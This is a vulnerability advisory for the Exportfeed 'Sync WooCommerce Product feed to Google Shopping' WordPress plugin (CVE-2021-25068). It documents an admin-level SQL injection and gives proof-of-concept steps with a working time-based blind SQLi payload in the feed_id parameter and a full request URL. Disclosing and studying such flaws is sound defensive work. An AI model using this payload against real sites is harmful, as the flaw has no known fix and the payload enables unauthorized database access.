WordPress Plugin Vulnerabilities

Sync WooCommerce Product feed to Google Shopping <= 1.2.4 - Admin+ SQLi

Description

The plugin uses the 'feed_id' POST parameter which is not properly sanitized for use in a SQL statement, leading to a SQL injection vulnerability in the admin dashboard

Proof of Concept

Install WooCommerce and 'Exportfeed for Woocommerce Google Product Feed' plugins
Perform initial config for the WooCommerce plugin and create a product
In the ExportFeed plugin settings go to Create Feed and Click Custom Product Feed, search for a product and capture the request with an intercepting proxy.
Modify the feed_id parameter with 1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih)

https://example.com/wp-admin/admin-ajax.php?security=a5e2dfc8ec&action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&keywords=snake&category=&brand=&sku=&merchat_type=Google&service_name=Google&limit=0,10&q=showT&feed_id=1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih)

Affects Plugins

Plugin icon
exportfeed-for-woocommerce-google-product-feed
No known fix

References

CVE
CVE-2021-25068

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
0xdecafbad
Submitter website
http://vuln.farm
Verified
Yes
WPVDB ID
32799efd-99dc-46dd-8648-e9eb872a0371

Timeline

Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2019-09-10
Title
SlickQuiz <= 1.3.7.1 - Authenticated SQL Injection
Published
2021-10-18
Title
Stream < 3.8.2 - Admin+ SQL Injection
Published
2015-12-15
Title
WP Polls < 2.72 - SQL Injection
Published
2014-12-03
Title
Google Document Embedder <= 2.5.16 - SQL Injection
Published
2024-02-27
Title
Conversios < 7.0.8 - Subscriber+ SQL Injection via ee_syncProductCategory